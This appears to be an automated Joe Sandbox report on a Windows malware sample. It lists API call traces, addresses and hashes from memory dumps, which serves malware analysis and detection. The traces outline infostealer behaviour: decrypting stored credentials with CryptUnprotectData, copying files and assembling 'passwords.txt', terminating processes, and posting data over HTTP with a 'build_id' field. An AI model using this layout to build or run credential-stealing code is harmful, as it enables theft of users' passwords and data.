                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$FileWrite
                                      • String ID:
                                      • API String ID: 3457131274-0
                                      • Opcode ID: 624c92fe13bd2054ffbdbbbf8eca5b1c525281a40635297f676c59b1710cd675
                                      • Instruction ID: fec17a9acd059f10915e74be088f68285009c6c1dff35c5934640f9094796685
                                      • Opcode Fuzzy Hash: 624c92fe13bd2054ffbdbbbf8eca5b1c525281a40635297f676c59b1710cd675
                                      • Instruction Fuzzy Hash: 5141E371611B049BC738DF69E991A67F7F8FF98310F54892EE88A87A40D631F904CB50
                                      APIs
                                      • GetLocalTime.KERNEL32(?,?,00000000,?,?,?,0030BE5D,?,?), ref: 0030A49B
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,0030BE5D,?,?), ref: 0030A4A9
                                        • Part of subcall function 00309D30: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,0030BE5D,?,?,?,0030BE5D,?,?), ref: 00309D3E
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030A4E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                       • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 568878067-0
                                      • Opcode ID: ac7adae78e69878d6e8ff85301c7baf670817be22f36fc4995c3d356c6913540
                                      • Instruction ID: 3620b7befca90357c7b826eee879ab0133e2a7e9d1af6b6659230ac905e96829
                                      • Opcode Fuzzy Hash: ac7adae78e69878d6e8ff85301c7baf670817be22f36fc4995c3d356c6913540
                                      • Instruction Fuzzy Hash: D4212AB1900B489FD725DF6DD880AAABBF8FB48304F50892EE59EC7700D770A544CBA4
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002F6D75
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 002F6D8D
                                      • LocalFree.KERNEL32(?), ref: 002F6DAE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                       • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001EC86), ref: 0030ECCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02F45258,00000000,?,003101E0,00000000,?,?), ref: 002F8B6A
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 002F8B84
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 002F8B8D
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002F8B9C
                                      • ??_U@YAPAXI@Z.MSVCRT(00000001), ref: 002F8BA6
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002F8BB9
                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 002F8BC6
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F8BCD
                                      • StrStrA.SHLWAPI(00000000,02F45240), ref: 002F8BDD
                                      • StrStrA.SHLWAPI(-00000010,02F45300), ref: 002F8BFB
                                      • lstrcat.KERNEL32(00000000,02F433A8), ref: 002F8C0E
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F8C1E
                                      • lstrcat.KERNEL32(00000000,003134BC), ref: 002F8C2A
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F8C3A
                                      • lstrcat.KERNEL32(00000000,003134B8), ref: 002F8C46
                                      • lstrcat.KERNEL32(00000000,02F43258), ref: 002F8C54
                                      • lstrcat.KERNEL32(00000000,-00000010), ref: 002F8C5C
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F8C68
                                      • StrStrA.SHLWAPI(00000000,02F45620), ref: 002F8C79
                                      • StrStrA.SHLWAPI(00000014,02F455C0), ref: 002F8C89
                                      • lstrcat.KERNEL32(00000000,02F43348), ref: 002F8C9D
                                        • Part of subcall function 002F8980: memset.MSVCRT ref: 002F89A9
                                        • Part of subcall function 002F8980: lstrlen.KERNEL32(?,00000001,?,00001FA0,00000000,00000000), ref: 002F89C6
                                        • Part of subcall function 002F8980: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002F89CE
                                        • Part of subcall function 002F8980: memcpy.MSVCRT(?,?,?), ref: 002F8A3A
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F8CAE
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F8CBA
                                      • StrStrA.SHLWAPI(00000000,02F455C0), ref: 002F8CCB
                                      • StrStrA.SHLWAPI(00000014,02F432F8), ref: 002F8CDB
                                      • lstrcat.KERNEL32(00000000,02F45288), ref: 002F8CEF
                                        • Part of subcall function 002F8980: lstrcat.KERNEL32(003101E9,003101E9), ref: 002F8A6D
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F8D00
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F8D0C
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F8D18
                                      • StrStrA.SHLWAPI(00000000,02F45240), ref: 002F8D29
                                      • lstrlen.KERNEL32(00000000), ref: 002F8D3D
                                      • CloseHandle.KERNEL32(00000000), ref: 002F8D7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocateBinaryCloseCreateCryptHandleProcessReadSizeStringmemcpymemset
                                      • String ID: passwords.txt
                                      • API String ID: 2200313820-347816968
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FBFD7
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FC00B
                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 002FC069
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FC070
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 002FC10C
                                      • lstrcat.KERNEL32(00000000,02F433A8), ref: 002FC123
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC133
                                      • lstrcat.KERNEL32(00000000,003134BC), ref: 002FC13F
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC14F
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      • lstrcat.KERNEL32(00000000,003134B8), ref: 002FC15B
                                      • lstrcat.KERNEL32(00000000,02F43258), ref: 002FC169
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC179
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FC185
                                      • lstrcat.KERNEL32(00000000,02F43348), ref: 002FC192
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC1A2
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FC1AE
                                      • lstrcat.KERNEL32(00000000,02F45288), ref: 002FC1BC
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FC1CC
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FC1D8
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FC1E4
                                      • lstrlen.KERNEL32(00000000), ref: 002FC211
                                      • DeleteFileA.KERNEL32(00000000), ref: 002FC275
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$AllocateCopy$CloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                      • String ID: passwords.txt
                                      • API String ID: 1608474789-347816968
                                      • Opcode ID: 5bc452223e9c3a185eb19167d07096e59de2eed3cb226aa8b280067cfb77a3a9
                                      • Instruction ID: c84e2de02a85e8788919665564031d04e3c5f658302d1c3c4091010ec2d735da
                                      • Opcode Fuzzy Hash: 5bc452223e9c3a185eb19167d07096e59de2eed3cb226aa8b280067cfb77a3a9
                                      • Instruction Fuzzy Hash: 89A15471921109ABDB55EBA0DE5ADFE777CAF24381F048034F606A2291DF30AA19CF71
                                      APIs
                                        • Part of subcall function 002FFA20: StrCmpCA.SHLWAPI(?,?,?,002F7177,02F433D8), ref: 002FFA2A
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F725E
                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 002F744B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F7452
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F7292
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F757D
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F7589
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F7599
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F75A5
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F75B5
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F75C1
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F75D1
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F75DD
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F75ED
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F75F9
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F7609
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F7615
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F7652
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F7666
                                      • lstrlen.KERNEL32(00000000), ref: 002F76B3
                                      • lstrlen.KERNEL32(00000000), ref: 002F76BF
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • DeleteFileA.KERNEL32(00000000,?,003101E9), ref: 002F771A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$File$CopyHeap$AllocateDeleteProcess
                                      • String ID:
                                      • API String ID: 510441641-0
                                      • Opcode ID: 474a11158c3446556901cfc1109250434c38e90c6a3345bac49900e91c8c69df
                                      • Instruction ID: 536727428ba6ce4b428de2cf4cb65aed2702428c88ec65f703220d34a27329fd
                                      • Opcode Fuzzy Hash: 474a11158c3446556901cfc1109250434c38e90c6a3345bac49900e91c8c69df
                                      • Instruction Fuzzy Hash: 8102507192010DABDB55EBA0DE56DFEB738AF24380F144138F60676291EF306A69CF61
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F8E75
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F8EAA
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002F8FC9
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F90F3
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F90FF
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F910F
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F911B
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F912B
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F9137
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F9147
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F9153
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F9163
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F916F
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F917F
                                      • lstrcat.KERNEL32(00000000,0031340C), ref: 002F918B
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002F919B
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002F91A7
                                      • lstrlen.KERNEL32(00000000), ref: 002F91FC
                                      • lstrlen.KERNEL32(00000000), ref: 002F9208
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F8FD0
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F9263
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$AllocateCopy$CloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                      • String ID:
                                      • API String ID: 1608474789-0
                                      • Opcode ID: 6ec03ae5ccf6045ecd91f22e4afab628e0fb9540f65921fcae4cccb9fcca2abb
                                      • Instruction ID: f117f48558a072fef151fcf90083457a06bfc5f8898dc660bb85e37686b5b55a
                                      • Opcode Fuzzy Hash: 6ec03ae5ccf6045ecd91f22e4afab628e0fb9540f65921fcae4cccb9fcca2abb
                                      • Instruction Fuzzy Hash: B7D1417192010DABDB55EBB0DE56DFEB778AF24780F144138F60672291EF206A29CF61
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F3EAC
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F3EC7
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F400D
                                      • HttpOpenRequestA.WININET(00000000,02F431B8,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F4048
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F406C
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003101E9,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 002F42BD
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002F42D6
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002F42E7
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002F42FE
                                      • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 002F434A
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4355
                                      • InternetCloseHandle.WININET(?), ref: 002F4367
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
